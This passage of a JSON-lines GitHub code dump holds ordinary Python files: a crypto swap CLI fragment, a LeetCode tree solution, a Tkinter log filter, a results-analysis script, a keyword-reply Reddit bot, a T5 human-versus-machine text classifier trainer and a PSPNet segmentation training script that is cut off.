action.lower().startswith(\"SWAP\".lower()):\n splits = action[4:].strip().split()\n if len(splits) < 3:\n print(\"required format \\\"swap {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.swap(splits[0], splits[1], w3.toWei(float(splits[2]), 'ether'))\n elif action.lower().startswith(\"ALLOWANCE\".lower()):\n oneInch.get_allowance(action[9:].strip())\n else:\n print(\"Operation Not Defined\")\n","repo_name":"nseidm1/1inchpython","sub_path":"OneInch.py","file_name":"OneInch.py","file_ext":"py","file_size_in_byte":15701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71335806440","text":"# Path Sum III\n# Tree\n\n# https://blog.csdn.net/fuxuemingzhu/article/details/71097135\n\nimport collections\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# DFS + DFS\n# runtime: faster than 32.80% \nclass Solution1:\n def pathSum(self, root: TreeNode, sum: int) -> int:\n if not root:\n return 0\n return self.dfs(root, sum) + self.pathSum(root.left, sum) + self.pathSum(root.right, sum)\n \n \n def dfs(self, root, sum):\n res = 0\n if not root:\n return res\n \n sum -= root.val\n if sum == 0:\n res += 1\n res += self.dfs(root.left, sum)\n res += self.dfs(root.right, sum)\n \n return res\n\n\n# DFS + BFS\n# runtime: faster than 30.11%\n# res is a one-element list: a plain int would be passed by value, i.e. copied into the function, so updates made inside the function would not be visible outside; wrapped in a list it is passed by reference, and in-place changes are visible to the caller.\nclass Solution2:\n def pathSum(self, root: TreeNode, sum: int) -> int:\n res = [0]\n que = collections.deque()\n que.append(root)\n while que:\n node = que.popleft()\n if not node:\n continue\n self.dfs(node, res, 0, sum)\n que.append(node.left)\n que.append(node.right)\n return res[0]\n \n \n def dfs(self, root, res, path, target):\n if not root:\n return\n path += root.val\n if path == target:\n res[0] += 1\n self.dfs(root.left, res, path, target)\n self.dfs(root.right, res, path, target)\n","repo_name":"junyang10734/leetcode-python","sub_path":"437.py","file_name":"437.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
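Both solutions above re-walk subtrees, giving roughly O(n^2) work in the worst case. For comparison, here is a one-pass prefix-sum variant with a running hash map; this is my sketch, not part of the original file, and the tiny TreeNode class is included only so it runs standalone:

from collections import defaultdict

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def path_sum(root, target):
    counts = defaultdict(int)
    counts[0] = 1  # the empty prefix

    def dfs(node, running):
        if not node:
            return 0
        running += node.val
        res = counts[running - target]  # paths ending at this node
        counts[running] += 1
        res += dfs(node.left, running) + dfs(node.right, running)
        counts[running] -= 1  # backtrack when leaving this node
        return res

    return dfs(root, 0)

root = TreeNode(1); root.left = TreeNode(2); root.right = TreeNode(3)
print(path_sum(root, 3))  # 2: the paths [1, 2] and [3]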
+{"seq_id":"930799527","text":"'''\r\n Copyright 2020 Micheal Wilson - mail4mikew@gmail.com\r\n\r\n This software is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n It is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <https://www.gnu.org/licenses/>.\r\n'''\r\n\r\nimport tkinter as tk\r\nfrom tkinter import filedialog as fd \r\nfrom tkinter import ttk\r\nimport re\r\n\r\nimport string\r\nfrom config import filter_options, marker_options\r\nfrom widgets import MarkTextBox, TextLineNumbers\r\n\r\nprintable = set(string.printable)\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.master = master\r\n self.Filter_Re = tk.StringVar()\r\n self.Mark_Re = tk.StringVar()\r\n self.available_filters = filter_options\r\n self.available_markers = marker_options\r\n self.pack()\r\n self.create_widgets()\r\n self.file_contents = []\r\n self.line_map = [] # for each filtered line displayed, the original line # \r\n \r\n def LoadFileWithFilter(self):\r\n try:\r\n total_lines = len(self.file_contents)\r\n first, last = [val*total_lines for val in self.textbox.yview()]\r\n if last < 1: \r\n first_to_show = 1\r\n else: \r\n first_to_show = self.line_map[int(first)] # line number to align display to after it is loaded\r\n print(\"first to show {}\".format(first_to_show))\r\n \r\n self.file_contents = []\r\n self.line_map = [] \r\n element = str(self.Filter_Re.get())\r\n marking = str(self.Mark_Re.get())\r\n print(\"Element selected '{}'\".format(element))\r\n lineNum = 1\r\n locateLineNum = 1\r\n with open(self.filename, \"r\") as input_file:\r\n lines = input_file.readlines()\r\n \r\n for line in lines: \r\n line = re.sub(r'[^\\x09-\\x7f]',r'.', line)\r\n lineNumStr = (\" {}\".format(lineNum))[-5:]\r\n keep = re.search(element, line)\r\n if keep:\r\n if self.HaveLineNums.get() == \"on\":\r\n line = \" \".join([lineNumStr, line])\r\n self.file_contents.append(line)\r\n self.line_map.append(lineNum)\r\n self.textbox.AddLineNumTag(locateLineNum,0,locateLineNum,5)\r\n else:\r\n self.file_contents.append(line)\r\n self.line_map.append(lineNum)\r\n \r\n for will_mark in re.finditer(marking, line):\r\n print(locateLineNum,will_mark.start(),locateLineNum,will_mark.end())\r\n self.textbox.AddMarkTag(locateLineNum,will_mark.start(),locateLineNum,will_mark.end()) \r\n \r\n locateLineNum += 1\r\n lineNum += 1\r\n \r\n self.textbox.LoadData(self.file_contents)\r\n \r\n for i,lineNum in enumerate(self.line_map):\r\n if lineNum >= first_to_show:\r\n first = float(i)/float(len(self.line_map))\r\n print(\"Restore show {} ({} of {} lines)\".format(first, i, len(self.line_map)))\r\n # self.textbox.see(\"{}.{}\".format(i,0))\r\n self.textbox.yview_moveto(first)\r\n break\r\n \r\n except AttributeError:\r\n pass\r\n\r\n \"\"\"\r\n from ScrolledText import ScrolledText\r\n s=ScrolledText()\r\n s.pack(fill='both', expand=1)\r\n s.insert('end', some_text)\r\n first, last = s.yview()\r\n s.delete(1.0, 'end')\r\n s.insert('end', some_text)\r\n s.yview_moveto(first)\r\n \"\"\"\r\n\r\n def GetFileName(self):\r\n self.filename = fd.askopenfilename(filetypes=((\"Logs\", \".log\"), (\"All files\",\"*.*\"))) \r\n print(self.filename)\r\n self.master.title(self.filename) # change the title of the app to a label of this filename\r\n self.LoadFileWithFilter() \r\n \r\n def on_filter_combo_select(self, event):\r\n element = self.Filter_Re.get()\r\n print(\"Element selected '{}'\".format(element))\r\n self.LoadFileWithFilter()\r\n\r\n def on_marker_combo_select(self, event):\r\n element = self.Mark_Re.get()\r\n print(\"Marker selected '{}'\".format(element))\r\n self.LoadFileWithFilter()\r\n\r\n def OnHaveLineNumsChanged(self):\r\n print(self.HaveLineNums.get())\r\n 
self.LoadFileWithFilter()\r\n\r\n def on_keypress_filters(self, event):\r\n if event.char == '\\r':\r\n self.on_apply_filters()\r\n\r\n def on_keypress_markers(self, event):\r\n if event.char == '\\r':\r\n self.on_apply_markers()\r\n\r\n def on_apply_filters(self):\r\n element = self.Filter_Re.get()\r\n print(\"Element selected '{}'\".format(element))\r\n self.available_filters.append(element)\r\n self.available_filters = list(set(self.available_filters)) # remove copies\r\n self.filter_re['values'] = self.available_filters\r\n self.LoadFileWithFilter()\r\n\r\n def on_apply_markers(self):\r\n element = self.Mark_Re.get()\r\n print(\"Element selected '{}'\".format(element))\r\n self.available_markers.append(element)\r\n self.available_markers = list(set(self.available_markers)) # remove copies\r\n self.marker_re['values'] = self.available_markers\r\n self.LoadFileWithFilter()\r\n \r\n def _on_change(self, event):\r\n self.linenumbers.redraw()\r\n \r\n def create_textbox_frame(self):\r\n self.textbox_frame = tk.Frame(self.master) \r\n\r\n # textbox with a scroll bar \r\n self.textbox = MarkTextBox(self.textbox_frame)\r\n \r\n self.scroll = tk.Scrollbar(self.textbox_frame, command = self.textbox.yview)\r\n self.textbox.configure(yscrollcommand=self.scroll.set)\r\n \r\n self.linenumbers = TextLineNumbers(self.textbox_frame, width=40)\r\n self.linenumbers.attach(self.textbox)\r\n\r\n # place the scrollbar next to the text box\r\n self.scroll.pack(side=tk.RIGHT, fill=tk.Y)\r\n self.linenumbers.pack(side=\"left\", fill=\"y\")\r\n self.textbox.pack(side=\"right\", fill=\"both\", expand=True)\r\n # self.textbox.pack(side=tk.LEFT, expand = tk.YES, fill=tk.BOTH) \r\n self.textbox.bind(\"<<Change>>\", self._on_change)\r\n self.textbox.bind(\"<Configure>\", self._on_change)\r\n\r\n def create_widgets(self):\r\n\r\n self.create_textbox_frame()\r\n self.textbox_frame.pack(side=tk.BOTTOM, expand = tk.YES, fill=tk.BOTH)\r\n\r\n # options frame goes on the top & contains a number of widgets\r\n self.options_frame = tk.Frame(self.master, borderwidth=5)\r\n self.options_frame.pack(side=tk.LEFT)\r\n\r\n # ROW 0\r\n\r\n # file dialog button\r\n self.file_select = tk.Button(self.options_frame, text='File Open', command=self.GetFileName)\r\n self.file_select.grid(row=0, column=0)\r\n\r\n # label\r\n tk.Label(self.options_frame, text=\"Filter Lines (RegEx)\", padx = 5, pady = 5).grid(row=0, column=1)\r\n \r\n # combo box\r\n self.filter_re = ttk.Combobox(self.options_frame, values=self.available_filters, textvariable = self.Filter_Re)\r\n self.filter_re.grid(row=0, column=2)\r\n self.filter_re.current(0)\r\n self.filter_re[\"width\"] = 60\r\n self.filter_re.bind(\"<<ComboboxSelected>>\", self.on_filter_combo_select)\r\n self.filter_re.bind(\"<Key>\", self.on_keypress_filters)\r\n\r\n # Apply filters button\r\n self.apply = tk.Button(self.options_frame)\r\n self.apply[\"text\"] = \"Apply\"\r\n self.apply[\"command\"] = self.on_apply_filters\r\n self.apply.grid(row=0, column=3)\r\n \r\n # ROW 1\r\n\r\n # Linenum checkbox\r\n self.HaveLineNums = tk.StringVar()\r\n self.HaveLineNums.set(\"on\")\r\n self.LineNumCheck = ttk.Checkbutton(self.options_frame,\r\n variable = self.HaveLineNums, \r\n text='Line #s',\r\n command=self.OnHaveLineNumsChanged, onvalue='on', offvalue='off')\r\n self.LineNumCheck.grid(row=1, column=0)\r\n\r\n # label\r\n tk.Label(self.options_frame, text=\"Mark Text (RegEx)\").grid(row=1, column=1)\r\n \r\n # combo box\r\n self.marker_re = ttk.Combobox(self.options_frame, values=self.available_markers, textvariable = self.Mark_Re)\r\n 
self.marker_re.grid(row=1, column=2)\r\n self.marker_re.current(0)\r\n self.marker_re[\"width\"] = 60\r\n self.marker_re.bind(\"<<ComboboxSelected>>\", self.on_marker_combo_select)\r\n self.marker_re.bind(\"<Key>\", self.on_keypress_markers)\r\n \r\n # Apply markers button\r\n self.apply = tk.Button(self.options_frame)\r\n self.apply[\"text\"] = \"Apply\"\r\n self.apply[\"command\"] = self.on_apply_markers\r\n self.apply.grid(row=1, column=3)\r\n\r\n \r\n\r\nroot = tk.Tk()\r\napp = Application(master=root)\r\napp.mainloop()","repo_name":"mj8w/LogFilter","sub_path":"src/Filter.py","file_name":"Filter.py","file_ext":"py","file_size_in_byte":9726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16189235344","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 7 10:06:33 2019\n\n@author: jplineb\n\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_csv('DF_resnet18_epoch9.csv')\n\ndef fixtrans(row):\n test_name = row['test_name']\n transforms = test_name.split('_')[2]\n return transforms\n\ndef fixnorm(row):\n test_name = row['test_name']\n norm = test_name.split('_')[3]\n return norm\n\ndf['transforms'] = df.apply(fixtrans, axis = 1)\ndf['normalized'] = df.apply(fixnorm, axis = 1)\n#df = df.drop(columns = ['split_nummax_error'])\ndf_mean = df.groupby('test_name').mean()\ndf_agg = df.groupby(['test_name']).agg([np.average, lambda x: np.std(x)/np.sqrt(5)])\ndf_agg_clean = pd.DataFrame(df, columns=['test_name', 'min_error'])\ndf_agg_clean = df_agg_clean.groupby(['test_name']).agg([np.average, lambda x: np.std(x)/np.sqrt(5)])\n\ndef findmaxmean(row):\n mean_error = row['min_error']['average']\n error_bar = row['min_error']['<lambda>']\n return (mean_error+(2*error_bar))\n\ndf_agg_clean['max_mean_error'] = df_agg_clean.apply(findmaxmean, axis =1)\n\n# Use for writing results to Excel\n#with pd.ExcelWriter('Test_suite_results_favs.xlsx') as writer:\n# df.to_excel(writer, sheet_name='All_Results')\n# df_mean.to_excel(writer, sheet_name='Means_grouped')\n# df_agg.to_excel(writer, sheet_name='Agg')","repo_name":"jplineb/Watson_ChickenProj_JP","sub_path":"Egg_ML/fastai/result_analysis/testing_suite_inference.py","file_name":"testing_suite_inference.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42588637099","text":"import random\nimport praw\nfrom praw.models import MoreComments\nfrom praw.exceptions import APIException\n\nkeywords = ['verstappen', 'hamilton', 'max', 'lewis', 'kimi']\n\nreddit = praw.Reddit(\n user_agent='kimi-bot',\n client_id='',\n client_secret='',\n username='',\n password='',\n ratelimit_seconds=300,\n)\n\nsubreddits = reddit.subreddit('aarava+tiametmarduk') \n\nfor comment in subreddits.stream.comments(skip_existing=True):\n if isinstance(comment, MoreComments):\n continue\n\n text = comment.body.lower()\n\n if comment.author.name == 'kimi-bot':\n continue\n else:\n for keyword in keywords:\n if (keyword in text):\n try:\n print(\"\\n\" + comment.author.name + \": \" + comment.body)\n print('I\\'ve just commented: BWOAH')\n comment.reply('BWOAH')\n except APIException as e:\n print(\"Oopsie\\n\\n\" + e.message)\n","repo_name":"R0dn3yS/dankbot","sub_path":"kimi.py","file_name":"kimi.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14062039833","text":"import sys\n# sys.path.append(\"../\")\nfrom transformers 
import (\n DataCollatorForSeq2Seq, AutoTokenizer, AutoModelForSeq2SeqLM, T5ForConditionalGeneration,\n Seq2SeqTrainingArguments, Trainer, Seq2SeqTrainer,AutoConfig\n)\nfrom datasets import load_dataset\nfrom torch.utils.data import DataLoader,Dataset\nimport torch\nfrom sklearn.metrics import accuracy_score,classification_report\nfrom tqdm import tqdm\nimport argparse\nfrom utils import create_optimizer\nfrom transformers.trainer_utils import SchedulerType\nimport math\nfrom transformers.optimization import get_scheduler\nimport os\nfrom torch.utils.tensorboard import SummaryWriter\nimport logging\nfrom transformers import set_seed\nfrom instruction import InstructionsHandler_Chinese,InstructionsHandler_English\n# from utils import OursGenerator\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\nclass trainCollator():\n def __init__(self,max_seq_length,tokenizer,language):\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n self.map = {\"0\":\"human\",\"1\":\"model\"}\n self.seq2seq_collator = DataCollatorForSeq2Seq(self.tokenizer)\n if language==\"en\":\n self.instructhandler = InstructionsHandler_English()\n elif language==\"zh\":\n self.instructhandler = InstructionsHandler_Chinese()\n else:\n raise ValueError(\"LANGUAGE ERROR\")\n\n def __call__(self, examples):\n t_examples = [ example[\"text\"] for example in examples ]\n labels = [ example[\"label\"] for example in examples ]\n text = []\n for example in t_examples:\n instruct = self.instructhandler.load_instruction_set()\n t=instruct['input_instruct']+example+instruct['eos_instruct']\n text.append(t)\n text_labels = []\n for label in labels:\n text_labels.append(self.map[str(label)])\n\n all_data = []\n for i in range(len(text)):\n row_text,row_label = text[i],text_labels[i]\n proc_data = self.tokenizer(\n row_text,\n truncation=True,\n max_length=self.max_seq_length,\n # return_tensors=\"pt\"\n )\n proc_label = self.tokenizer(\n row_label,\n truncation=True,\n max_length=self.max_seq_length,\n # return_tensors=\"pt\"\n )\n proc_data[\"labels\"] = proc_label[\"input_ids\"]\n all_data.append(proc_data)\n all_data = self.seq2seq_collator(all_data)\n return all_data\n\nclass evalCollator():\n def __init__(self,max_seq_length,tokenizer,language):\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n self.seq2seq_collator = DataCollatorForSeq2Seq(self.tokenizer)\n if language==\"en\":\n self.instructhandler = InstructionsHandler_English()\n elif language==\"zh\":\n self.instructhandler = InstructionsHandler_Chinese()\n else:\n raise ValueError(\"LANGUAGE ERROR\")\n\n def __call__(self, examples):\n\n t_examples = [ example[\"text\"] for example in examples ]\n text = []\n for example in t_examples:\n instruct = self.instructhandler.load_instruction_set()\n t=instruct['input_instruct']+example+instruct['eos_instruct']\n text.append(t)\n labels =[ example[\"label\"] for example in examples ]\n\n proc_data = self.tokenizer(\n text,\n truncation=True,\n max_length=self.max_seq_length,\n padding=\"longest\",\n return_tensors=\"pt\"\n )\n proc_data[\"labels\"] = labels\n return proc_data\n\n@torch.no_grad()\ndef test(test_loader,model,tokenizer,device):\n model.eval()\n y_true,y_pred=[],[]\n for batch in tqdm(test_loader):\n input_ids,labels = batch[\"input_ids\"].to(device),batch[\"labels\"]\n output = model.generate(input_ids)\n output_texts = tokenizer.batch_decode(output, skip_special_tokens=True)\n # predict = [ for output_text in output_texts ]\n for output_text in 
output_texts:\n if output_text.lower() == \"human\":\n predict = 0\n elif output_text.lower() == \"model\":\n predict = 1\n else:\n predict = 2\n y_pred.append(predict)\n y_true.extend(labels)\n acc = accuracy_score(y_true=y_true, y_pred=y_pred)\n model.train()\n return acc\n\ndef main(args):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n # config = AutoConfig.from_pretrained(args.model)\n tokenizer = AutoTokenizer.from_pretrained(args.model)\n model = AutoModelForSeq2SeqLM.from_pretrained(args.model)\n model.to(device)\n set_seed(args.seed)\n train_collator=trainCollator(max_seq_length=args.max_length, tokenizer=tokenizer,language=args.lang)\n eval_collator=evalCollator(max_seq_length=args.max_length, tokenizer=tokenizer,language=args.lang)\n dataset = load_dataset(\"json\",data_files=args.train_path)\n train_loader = DataLoader(\n dataset[\"train\"],\n batch_size=args.batch_size,\n collate_fn=train_collator,\n shuffle=True,\n drop_last=False,\n num_workers=10,\n pin_memory=True,\n )\n ours_dataset = load_dataset(\"json\",data_files={\"validation\":args.ours_val_path})\n ours_val_loader = DataLoader(\n ours_dataset[\"validation\"],\n batch_size=args.batch_size,\n collate_fn=eval_collator,\n shuffle=True,\n drop_last=False,\n num_workers=10,\n pin_memory=True,\n )\n hc3_dataset = load_dataset(\"json\",data_files={\"validation\":args.hc3_val_path})\n hc3_val_loader = DataLoader(\n hc3_dataset[\"validation\"],\n batch_size=args.batch_size,\n collate_fn=eval_collator,\n shuffle=True,\n drop_last=False,\n num_workers=10,\n pin_memory=True,\n )\n optimizer = create_optimizer(args,model)\n os.makedirs(args.tensorboard_dir,exist_ok=True)\n os.makedirs(args.save_path,exist_ok=True)\n writer = SummaryWriter(args.tensorboard_dir)\n\n effect_batch = args.batch_size * args.accumulation_steps\n num_training_steps_per_epoch = math.ceil(len(train_loader.dataset) // effect_batch)\n num_training_steps = num_training_steps_per_epoch * args.epochs\n num_warmup_steps = num_training_steps * args.warm_up_ratio\n test_steps = num_training_steps // args.num_test_times\n scheduler = get_scheduler(\n SchedulerType.LINEAR,\n # SchedulerType.CONSTANT,\n optimizer,\n num_warmup_steps=num_warmup_steps,\n num_training_steps=num_training_steps,\n )\n\n global_step = 0\n best_ours_acc = -1\n best_hc3_acc = -1\n accumulation_steps = args.accumulation_steps\n for epoch in range(args.epochs):\n model.train()\n for model_inputs in tqdm(train_loader):\n if global_step%accumulation_steps==0:\n scheduler.step()\n \n for k in model_inputs:\n model_inputs[k]=model_inputs[k].to(device)\n output = model(**model_inputs)\n loss = output.loss\n \n acc_loss = loss/accumulation_steps\n acc_loss.backward()\n if((global_step+1)%accumulation_steps)==0:\n optimizer.step()\n optimizer.zero_grad() \n\n writer.add_scalar('loss', loss.item(), global_step)\n writer.add_scalar('lr', scheduler.get_last_lr()[0], global_step)\n \n if (global_step+1) % test_steps==0:\n # if global_step % 1==0:\n ours_val_acc = test(ours_val_loader,model,tokenizer,device)\n hc3_val_acc = test(hc3_val_loader,model,tokenizer,device)\n writer.add_scalar('ours_val_acc', ours_val_acc, global_step)\n writer.add_scalar('hc3_val_acc', hc3_val_acc, global_step)\n logger.info(f\"ours acc:{ours_val_acc}\")\n logger.info(f\"hc3 acc:{hc3_val_acc}\")\n\n if ours_val_acc >= best_ours_acc:\n best_ours_acc = ours_val_acc\n save_path = args.save_path + os.sep + \"ours\"\n model.save_pretrained(save_path)\n tokenizer.save_pretrained(save_path)\n logger.info(f\"best ours 
acc:{best_ours_acc}\")\n if hc3_val_acc >= best_hc3_acc:\n best_hc3_acc = hc3_val_acc\n save_path = args.save_path + os.sep + \"hc3\"\n model.save_pretrained(save_path)\n tokenizer.save_pretrained(save_path)\n logger.info(f\"best hc3 acc:{hc3_val_acc}\")\n\n global_step+=1\n \ndef parser_args():\n parser = argparse.ArgumentParser(description='train parameters')\n parser.add_argument('--train_path', default='debug_dataset/zh/train.jsonl', type=str)\n parser.add_argument('--hc3_val_path', default='debug_dataset/zh/val_hc3.jsonl', type=str)\n parser.add_argument('--ours_val_path', default='debug_dataset/zh/val_ours.jsonl', type=str)\n parser.add_argument('--model', default=\"chinese_tk_base\", type=str)\n parser.add_argument('--max_length', default=512,type=int)\n parser.add_argument('--batch_size',default=4,type=int)\n parser.add_argument('--save_path', default='model/debug', type=str,help=\"save folder\")\n parser.add_argument('--tensorboard_dir', default='tflog/debug', type=str,help=\"save folder\")\n parser.add_argument('--lr',default=5e-5,type=float)\n parser.add_argument('--weight_decay',default=0,type=float)\n parser.add_argument('--warm_up_ratio',default=0.0,type=float)\n parser.add_argument('--epochs',default=10,type=int)\n parser.add_argument('--num_test_times', default=1, type=int,\n help='number of verifications')\n parser.add_argument('--lang', default=\"zh\", type=str,\n help='language')\n parser.add_argument('--accumulation_steps', default=2, type=int) \n parser.add_argument('--seed', default=42, type=int)\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parser_args() \n main(args)","repo_name":"Saggressive/HC3","sub_path":"run_s2s.py","file_name":"run_s2s.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44066845978","text":"#coding=utf-8\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport cv2\nimport datetime\nslim = tf.contrib.slim\nimport model.pspnet as pspnet\n\nimport input_data\nimport utils.utils as Utils\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# for dataset\nflags.DEFINE_integer('height', 1024, 'The height of raw image.')\nflags.DEFINE_integer('width', 2048, 'The width of raw image.')\nflags.DEFINE_integer('crop_height', 768, 'The height of cropped image used for training.')\nflags.DEFINE_integer('crop_width', 768, 'The width of cropped image used for training.')\nflags.DEFINE_integer('channels', 3, 'The channels of input image.')\nflags.DEFINE_integer('ignore_label', 255, 'The ignore label value.')\nflags.DEFINE_integer('classes', 19, 'The ignore label value.')\n#flags.DEFINE_multi_float('rgb_mean', [123.15,115.90,103.06], 'RGB mean value of ImageNet.')\nflags.DEFINE_multi_float('rgb_mean', [72.39239876,82.90891754,73.15835921], 'RGB mean value of ImageNet.')\n\n# for augmentation\nflags.DEFINE_boolean('train_random_scales', True, 'whether to random scale.')\nflags.DEFINE_multi_float('scales', [0.5,0.75,1.0,1.25,1.5,1.75,2.0], 'Scales for random scale.')\nflags.DEFINE_boolean('train_random_mirror', True, 'whether to random mirror.')\n\nflags.DEFINE_boolean('val_random_scales', False, 'whether to random scale.')\nflags.DEFINE_boolean('val_random_mirror', False, 'whether to random mirror.')\n\n# for training configuration\nflags.DEFINE_integer('batch_size', 4, 'The number of images in each batch during 
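A side note on the training loop in run_s2s.py above: it calls scheduler.step() at the top of each accumulation cycle, before the first optimizer.step() has happened, whereas the conventional ordering advances the scheduler only after the optimizer update. A self-contained toy sketch of that ordering; the model, data and scheduler choice here are made up for illustration:

import torch
from torch import nn

# Toy setup so the ordering is runnable end to end.
model = nn.Linear(4, 1)
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-5)
scheduler = torch.optim.lr_scheduler.LinearLR(optimizer, total_iters=10)
data = [torch.randn(8, 4) for _ in range(6)]

accumulation_steps = 2
optimizer.zero_grad()
for step, x in enumerate(data):
    loss = model(x).pow(2).mean() / accumulation_steps  # scale so gradients average
    loss.backward()
    if (step + 1) % accumulation_steps == 0:
        optimizer.step()       # update the weights first
        scheduler.step()       # then advance the LR schedule
        optimizer.zero_grad()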
training.')\nflags.DEFINE_integer('max_epoches', 40, 'The max epoches to train the model.')\nflags.DEFINE_integer('samples', 2975, 'The number of images used to train.')\n\nMAX_STEPS = FLAGS.max_epoches * FLAGS.samples // FLAGS.batch_size\n\n# for network configration\nflags.DEFINE_integer('output_stride', 16, 'output stride in the resnet model.')\n\n\n# network hyper-parameters\nflags.DEFINE_float('initial_lr', 1e-2, 'The initial learning rate.')\nflags.DEFINE_float('end_lr', 1e-6, 'The end learning rate.')\nflags.DEFINE_integer('decay_steps', 50000, 'Used for poly learning rate.')\nflags.DEFINE_float('weight_decay', 1e-4, 'The weight decay value for l2 regularization.')\nflags.DEFINE_float('power', 0.9, 'Used for poly learning rate.')\n\n# for saved configration\nflags.DEFINE_string('saved_ckpt_path', './checkpoint/', 'Path to save training checkpoint.')\nflags.DEFINE_string('saved_summary_train_path', './summary/train/', 'Path to save training summary.')\nflags.DEFINE_string('saved_summary_test_path', './summary/test/', 'Path to save test summary.')\nflags.DEFINE_string('pretrained_model_path', './resnet_v2_101_2017_04_14/resnet_v2_101.ckpt', 'Path to save test summary.')\n\n'''\n\ndef weighted_loss(logits, labels, num_classes, head=None, ignore=19):\n \"\"\"re-weighting\"\"\"\n with tf.name_scope('loss'):\n logits = tf.reshape(logits, (-1, num_classes))\n\n epsilon = tf.constant(value=1e-10)\n\n logits = logits + epsilon\n\n label_flat = tf.reshape(labels, (-1, 1))\n labels = tf.reshape(tf.one_hot(label_flat, depth=num_classes), (-1, num_classes))\n\n softmax = tf.nn.softmax(logits)\n\n #if head == None:\n # cross_entropy = -tf.reduce_sum(labels * tf.log(softmax + epsilon), axis=[1])\n #else:\n cross_entropy = -tf.reduce_sum(tf.multiply(labels * tf.log(softmax + epsilon), head), axis=[1])\n\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n\n return cross_entropy_mean\n\ndef cal_loss(logits, labels):\n\n\n #CLASS_NAMES = ['road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light', 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle']\n\n\n loss_weight = [3.045384, 12.862123, 4.509889, 38.15694, 35.25279, 31.482613, \\\n 45.792305, 39.694073, 6.0639296, 32.16484, 17.109228, 31.563286, \\\n 47.333973, 11.610675, 44.60042, 45.23716, 45.283024, 48.14782, 41.924667]\n loss_weight = np.array(loss_weight)\n\n labels = tf.cast(labels, tf.int32)\n\n # return loss(logits, labels)\n return weighted_loss(logits, labels, num_classes=CLASSES, head=loss_weight)\n'''\n\ndef cal_loss(logits, y, loss_weight=1.0):\n '''\n raw_prediction = tf.reshape(logits, [-1, CLASSES])\n raw_gt = tf.reshape(y, [-1])\n indices = tf.squeeze(tf.where(tf.less_equal(raw_gt, CLASSES - 1)), 1)\n gt = tf.cast(tf.gather(raw_gt, indices), tf.int32)\n prediction = tf.gather(raw_prediction, indices)\n # Pixel-wise softmax loss.\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=prediction, labels=gt)\n '''\n\n y = tf.reshape(y, shape=[-1])\n not_ignore_mask = tf.to_float(tf.not_equal(y,\n FLAGS.ignore_label)) * loss_weight\n one_hot_labels = tf.one_hot(\n y, FLAGS.classes, on_value=1.0, off_value=0.0)\n logits = tf.reshape(logits, shape=[-1, FLAGS.classes])\n loss = tf.losses.softmax_cross_entropy(onehot_labels=one_hot_labels, logits=logits, weights=not_ignore_mask)\n\n return tf.reduce_mean(loss)\n\n\nwith tf.name_scope('input'):\n x = tf.placeholder(dtype=tf.float32, shape=[FLAGS.batch_size, 
FLAGS.crop_height, FLAGS.crop_width, FLAGS.channels], name='x_input')\n y = tf.placeholder(dtype=tf.int32, shape=[FLAGS.batch_size, FLAGS.crop_height, FLAGS.crop_width], name='ground_truth')\n\nauxi_logits, logits = pspnet.PSPNet(x, is_training=True, output_stride=FLAGS.output_stride, pre_trained_model=FLAGS.pretrained_model_path, classes=FLAGS.classes)\n\n\nwith tf.name_scope('regularization'):\n train_var_list = [v for v in tf.trainable_variables()\n if 'beta' not in v.name and 'gamma' not in v.name]\n # Add weight decay to the loss.\n with tf.variable_scope(\"total_loss\"):\n l2_loss = FLAGS.weight_decay * tf.add_n(\n [tf.nn.l2_loss(v) for v in train_var_list])\n\nwith tf.name_scope('loss'):\n #reshaped_logits = tf.reshape(logits, [BATCH_SIZE, -1])\n #reshape_y = tf.reshape(y, [BATCH_SIZE, -1])\n #loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=reshape_y, logits=reshaped_logits), name='loss')\n #loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits), name='loss')\n loss_1 = cal_loss(logits, y)\n tf.summary.scalar('loss', loss_1)\n loss_2 = cal_loss(auxi_logits, y)\n loss_all = loss_1 + l2_loss\n #loss_all = loss\n tf.summary.scalar('loss_all', 